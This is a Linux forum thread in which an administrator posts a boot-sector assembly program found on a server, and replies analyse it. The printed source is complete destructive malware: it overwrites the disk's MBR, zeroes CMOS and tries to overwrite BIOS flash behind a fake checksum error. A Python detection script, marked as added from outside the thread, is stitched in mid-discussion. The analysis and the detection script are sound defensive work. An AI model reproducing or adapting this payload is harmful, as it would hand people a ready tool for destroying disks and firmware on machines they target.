Linux - Security: This forum is for all security related questions. Questions, tips, system compromises, firewalls, etc. are all included here.
I recently found this code on my server... I am posting it here because
I want to clarify what I think it does and if indeed it would do it.
As for now the user's account has been frozen. I don't
like this code.
What I have asserted:
1- it's a boot sector
2- it writes random stuff to IDE0
3- it *tries* to write to ROM, possibly nuke the BIOS?!!!?
Thanks for any input...
Code:
BITS 16
org 0

EntryPoint:
    jmp 0x07C0:AfterData    ; far jump sets CS=07C0h (BIOS loads the sector at 0000:7C00)

; BIOS PARAMETER BLOCK
; Note: the jump above is a 5-byte far jump, so the fields below do not sit
; at the standard BPB offsets (a real FAT header has a 3-byte jump and the
; OEM name at byte 3), and volumeLabel / systemID are shorter than the
; 11 / 8 bytes FAT12 uses. Nothing in this loader reads these fields.
oemID               db "DIE-OS", 0, 0   ; 8 bytes
bytSPerSector       dw 0200h
sectorsPerCluster   db 01h
nrReservedSectors   dw 0001h            ; bootloader spans 1 sector
nrFats              db 02h
nrRootDirs          dw 00E0h
totalSectorsSmall   dw 0B40h
mediaID             db 0F0h
sectorsPerFat       dw 0009h
sectorsPerTrack     dw 0012h
headsPerCylinder    dw 0002h
hiddenSectors       dd 00000000h
totalSectorsLarge   dd 00000000h
driveNr             db 00h
; optional fields, not needed on FAT12, skipped to save size
flags               db 00h
signature           db 29h
volumeID            dd 0FFFFFFFFh
volumeLabel         db "XXXXXXXXX"
systemID            db "FAT12 "

; my data
BOOT_MSG db 'BIOS CHECKSUM ERROR',10,13,0   ; fake error text shown while the payload runs
BLAH     dw 0

AfterData:
    ; DS = ES = CS = 07C0h so the data labels above resolve
    push cs
    pop ds
    push cs
    pop es
    ; stack at 0000:FFFF
    mov ax, 0x0000
    mov ss, ax
    mov sp, 0xFFFF
    ; show the bogus message, beep, then run the destructive routines
    lea si, [BOOT_MSG]
    call Print
    call Play
    call kill_hdd
    jmp kill_BIOS

;************************************************************
; Procedure Print
; prints a zero-terminated string pointed to by SI
; (BIOS teletype service int 10h / AH=0Eh, not direct video memory)
;************************************************************
Print:
    push ax
    mov ah, 14          ; int 10h function 0Eh: teletype output
    cld
print_loop:
    lodsb               ; next character into AL
    or al, al           ; NUL terminator?
    jz printdone
    int 10h             ; call BIOS
    jmp print_loop
printdone:
    pop ax
    ret
; End of print procedure

; Play: drive the PC speaker through PIT channel 2 (ports 42h/43h, 61h).
; Divisor = 00144F38h / 0666h = 812, i.e. a tone of roughly 1.47 kHz.
; The speaker is never switched off again.
Play:
    mov di, 0666h
    in al, 061h
    or al, 3            ; speaker gate + data bits on port 61h
    out 061h, al
    mov al, 0b6h        ; PIT: channel 2, lo/hi byte, square wave
    out 043h, al
    mov dx, 014h
    mov ax, 04f38h
    div di              ; AX = 00144F38h / 0666h
    out 042h, al        ; low byte of divisor
    mov al, ah
    out 042h, al        ; high byte of divisor
    ret

; kill_hdd: program the primary IDE controller (1F0h-1F7h) in CHS mode for
; WRITE SECTORS (command 30h) at cylinder 0, head 0, sector 1 (the MBR) of
; the master drive, then push 513 words from DS:C000h through the data
; port. The MBR is overwritten with whatever happens to be in memory.
; No BSY/DRQ status polling is done before the transfer.
kill_hdd:
    mov dx, 1F2h
    mov al, 1
    out dx, al          ; 1F2h: sector count = 1
    inc dx
    out dx, al          ; 1F3h: sector number = 1
    inc dx
    xor ax, ax
    out dx, al          ; 1F4h: cylinder low = 0
    inc dx
    out dx, al          ; 1F5h: cylinder high = 0
    mov al, 10100000b   ; 1F6h: CHS addressing, master drive, head 0
    inc dx
    out dx, al
    inc dx
    mov al, 30h         ; 1F7h: WRITE SECTORS
    out dx, al
    lea si, [0c000h]    ; source buffer: DS:C000h (uninitialised memory)
    mov dx, 1F0h
    mov cx, 513         ; 513 words: one sector plus one extra word
    rep outsw
    ret

; kill_BIOS: zero all 128 bytes of CMOS through ports 70h/71h, then try to
; unlock and overwrite the BIOS flash. The flash part reads like a 16-bit
; port of code written for one particular chipset and flash chip, and
; several instructions do not do what the comments claim (the 32-bit PCI
; configuration address is truncated to 16 bits, [ECX] addressing exceeds
; the 64k real-mode segment limit, CL/AL are reused with stale values).
kill_BIOS:
    cli                 ; no interrupts from here on
    mov cl, 128         ; CMOS has 128 bytes
Nuke_CMOS_Byte:
    dec cl              ; done?
    js Nuke_BIOS        ; CL wrapped past 0: all 128 bytes written
    mov al, cl          ; select CMOS index CL
    out 70h, al
    xor al, al          ; write 0
    out 71h, al
    jmp Nuke_CMOS_Byte  ; repeat until all is done

Nuke_BIOS:
    ; Show BIOS page in 000E0000 - 000EFFFF (64k) via PCI config ports
    ; 0CF8h/0CFCh (OUT DX,AX sends only the low 16 bits of EDI).
    mov edi, 8000384Ch
    mov bp, 0CF8h
    mov dx, 0CFEh
    call IOForEEPROM
    ; Show BIOS page in 000F0000 - 000FFFFF (64k).
    mov di, 0058h
    dec dx
    call IOForEEPROM
    ; ***********************
    ; * Show the BIOS extra *
    ; * ROM data in memory  *
    ; * 000E0000 - 000E01FF *
    ; * ( 512 bytes ), and  *
    ; * make the extra BIOS *
    ; * section writable    *
    ; ***********************
    ; flash command sequence written to E5555h / E2AAAh
    push 0e555h
    pop ds
    mov si, 5
    push 0e2aah
    pop es
    mov byte [ds:si], 0aah
    mov byte [es:0ah], 055h
    mov byte [ds:si], 80h
    mov byte [ds:si], cl    ; CL and AL still hold leftovers from the CMOS loop
    mov byte [es:0ah], al
    mov byte [ds:si], 60h
    mov ecx, 0e2aaah
    loop $                  ; very tiny delay
    mov ecx, 0e2aaah        ; restore ECX (can't use push/pop, the stack is 16-bit)
    ; Kill off BIOS extra ROM data in 000E0000h - 000E007Fh (80h bytes).
    xor ah, ah
    mov word [ds:si], 'RI'
    xchg cx, ax
    loop $
    ; ***********************
    ; * Show and enable the *
    ; * BIOS main ROM data  *
    ; * 000E0000 - 000FFFFF *
    ; * ( 128 KB ) to be    *
    ; * written             *
    ; ***********************
    push 0f555h
    pop ds
    mov si, 5
    mov ecx, 0e2aaah
    mov ch, 0AAh
    ; Enable EEPROM write.
    mov [ds:si], cl
    mov byte [ecx], al      ; 32-bit address above the 64k real-mode limit
    mov byte [ds:si], 80h
    mov byte [ds:si], cl
    mov byte [ecx], al
    mov byte [ds:si], 20h
    loop $
    ; Destroy BIOS main ROM data in 000FE000h - 000FE07Fh (80h bytes).
    xor al, al
    push 0fe00h
    pop ds
    mov si, 0
    mov [ds:si], al
    call IOForEEPROM
    ; store magic value at 0040h:0072h to reboot:
    ;   0000h - cold boot
    ;   1234h - warm boot
    mov ax, 0040h
    mov ds, ax
    mov word [0072h], 0000h ; cold boot
    jmp 0FFFFh:0000h        ; reboot!

; I/O for EEPROM: write the config address held in DI/EDI to the port in
; BP, read a byte from the port in DX, OR 44h into it and write it back.
IOForEEPROM:
    xchg di, ax
    xchg dx, bp
    out dx, ax
    xchg di, ax
    xchg dx, bp
    in al, dx
    or al, 44h
    xchg di, ax
    xchg dx, bp
    out dx, ax
    xchg di, ax
    xchg dx, bp
    out dx, al
    ret

; Make the file 512 bytes long
TIMES 510-($-$$) DB 0
; Add the boot signature
dw 0AA55h
Somehow it doesn't look finished to me.
But reading through the code it does look like there are procedures to write to 128 KB portions of the BIOS flash ROM, including cold boot and warm boot checks, a reboot routine, and a hard disk write routine.
Whether or not it is for malicious intent depends on the user's history, I think?
I've written simple assembly code on x86 machines back in the 90's to read and write the PC BIOS before. This indeed is designed, once compiled, to write to the BIOS. Never a good idea unless you know exactly what you are doing. Without going into details, this code will display a message (BIOS CHECKSUM ERROR) directly into video memory, i.e. the screen, and then write 0's over the entire CMOS area. Usually that's bad. :-)
This does not appear to be friendly code.
The kill_hdd section is classic assembly code for deleting the boot sector of a hard drive. Practically straight from a textbook.
I've not done any boot sector programs so I can't comment on that. But there is no viral code for spreading. Looks like something would need to write this to the boot sector of a device (floppy, CD or hard drive) and then boot from that device before it would be dangerous. After the code is compiled, obviously.
-b
edit:
forgot to mention I suppose it could be on the boot sector of a usb flash drive too.
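Bignerd's point that the code only becomes dangerous once it has been written to a device's first sector suggests the obvious check: read the first 512 bytes of each disk (dd, or open the block device as root) and look for this loader. The script below is an added example and not code from this thread or from the poster. It decodes the FAT BIOS Parameter Block at its standard offsets, flags field values that cannot belong to a real FAT12 header, and scans for byte patterns taken from the listing (the OEM string, the fake error message, and the x86 encodings of its CMOS and IDE port writes). The sample sector it triages is constructed by hand from the listing's data section plus a few of its opcode bytes, not assembled from the original source; the far-jump target offset 54h is assumed from that constructed layout, and the clean control sector is an ordinary FAT12 floppy header, also constructed here.

```python
"""Boot-sector triage for the indicators in the posted DIE-OS loader.
Added example, not code from the thread. The sample sector is constructed
by hand from the listing's data section plus a few of its opcode bytes."""
import struct

SECTOR_SIZE = 512
BOOT_SIGNATURE = 0xAA55
BPB_FORMAT = "<HBHBHHBHHHII"   # standard FAT BPB, sector offsets 11..35

# Patterns taken from the listing: its strings, and the x86 encodings of
# the instructions that hit the CMOS (70h/71h) and IDE (1F2h/1F7h) ports.
INDICATORS = {
    "oem_id_DIE-OS": b"DIE-OS\x00\x00",
    "fake_bios_checksum_message": b"BIOS CHECKSUM ERROR",
    "cmos_index_write(out 70h,al)": b"\xe6\x70",
    "cmos_data_write(out 71h,al)": b"\xe6\x71",
    "ide_setup(mov dx,1F2h)": b"\xba\xf2\x01",
    "ide_write_sectors_cmd(mov al,30h)": b"\xb0\x30",
}


def parse_bpb(sector):
    """Decode the BIOS Parameter Block at its *standard* offsets."""
    if len(sector) != SECTOR_SIZE:
        raise ValueError("boot sector must be exactly 512 bytes")
    (bps, spc, reserved, fats, root_entries, total_small, media,
     spf, spt, heads, hidden, total_large) = struct.unpack_from(BPB_FORMAT, sector, 11)
    return {
        "jump": sector[0:3],
        "oem_name": sector[3:11],
        "bytes_per_sector": bps,
        "sectors_per_cluster": spc,
        "reserved_sectors": reserved,
        "fats": fats,
        "root_entries": root_entries,
        "total_sectors": total_small or total_large,
        "media": media,
        "sectors_per_fat": spf,
        "sectors_per_track": spt,
        "heads": heads,
        "hidden_sectors": hidden,
        "signature": struct.unpack_from("<H", sector, 510)[0],
    }


def triage(sector):
    """Return a list of findings for one sector; an empty list is clean."""
    bpb = parse_bpb(sector)
    findings = []
    if bpb["signature"] != BOOT_SIGNATURE:
        findings.append("missing 55AA boot signature (BIOS will not boot it)")
    # Real FAT loaders start with EB xx 90 or E9 xx xx. The listing's 5-byte
    # far jump (EA) shifts every BPB field 2 bytes off its standard offset,
    # which is why the decoded geometry below comes out as garbage.
    if bpb["jump"][0] not in (0xEB, 0xE9):
        findings.append("nonstandard jump opcode %02X at offset 0" % bpb["jump"][0])
    if bpb["bytes_per_sector"] not in (512, 1024, 2048, 4096):
        findings.append("implausible bytes_per_sector=%d" % bpb["bytes_per_sector"])
    spc = bpb["sectors_per_cluster"]
    if spc == 0 or spc & (spc - 1):
        findings.append("implausible sectors_per_cluster=%d" % spc)
    for name, pattern in INDICATORS.items():
        if pattern in sector:
            findings.append("indicator %s at offset %d" % (name, sector.index(pattern)))
    return findings


def build_sample_sector():
    """Constructed sample laid out like the listing: far jump, misaligned
    BPB, fake message, a few payload opcodes, zero padding, 55AA."""
    header = b"\xea\x54\x00\xc0\x07"            # jmp 07C0h:0054h (AfterData in this layout, assumed)
    header += b"DIE-OS\x00\x00"
    header += struct.pack(BPB_FORMAT, 0x200, 1, 1, 2, 0xE0, 0xB40, 0xF0, 9, 0x12, 2, 0, 0)
    header += b"\x00\x00\x29\xff\xff\xff\xff" + b"XXXXXXXXX" + b"FAT12 "
    header += b"BIOS CHECKSUM ERROR\n\r\x00" + b"\x00\x00"
    body = (b"\xfa"             # cli
            b"\xb1\x80"         # mov cl,128
            b"\xe6\x70"         # out 70h,al
            b"\x30\xc0"         # xor al,al
            b"\xe6\x71"         # out 71h,al
            b"\xba\xf2\x01"     # mov dx,1F2h
            b"\xb0\x30")        # mov al,30h
    sector = header + body
    return sector + b"\x00" * (510 - len(sector)) + b"\x55\xaa"


def build_clean_sector():
    """Constructed control: an ordinary 1.44 MB FAT12 floppy header."""
    sector = b"\xeb\x3c\x90" + b"MSWIN4.1"
    sector += struct.pack(BPB_FORMAT, 512, 1, 1, 2, 224, 2880, 0xF0, 9, 18, 2, 0, 0)
    return sector + b"\x00" * (510 - len(sector)) + b"\x55\xaa"


if __name__ == "__main__":
    for finding in triage(build_sample_sector()):
        print(finding)
```

Against a live machine, run it as root on the first sector of each disk, for instance `triage(open("/dev/sda", "rb").read(512))`; an empty list is the clean result, which is what the constructed floppy header produces, while the sample modelled on the listing trips the jump, geometry and port-write checks.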
Bignerd,
thanks for your reply...since you seemed most knowledgeable about this I sent you an email to expand upon.
thanks to the other responders as well
regards
On a related note, I do assume that something like this can not be exploited without root/physical access, correct? It would seem like such a big and such an obvious security hole, but hey, I figured I'd ask.
Quote:
Originally posted by Paul6253
Bignerd,
thanks for your reply...since you seemed most knowledgeable about this I sent you an email to expand upon.
thanks to the other responders as well
regards
got your email but my reply to you bounced.
Message from yahoo.com.
Unable to deliver message to the following address(es).
Quote:
Originally posted by Matir
On a related note, I do assume that something like this can not be exploited without root/physical access, correct? It would seem like such a big and such an obvious security hole, but hey, I figured I'd ask.
correct. Because this is boot sector code, you need to have write access to the boot sector on a particular device. Usually the hard drive, unless you have physical access and can use a floppy (or hey, maybe even a CD/DVD).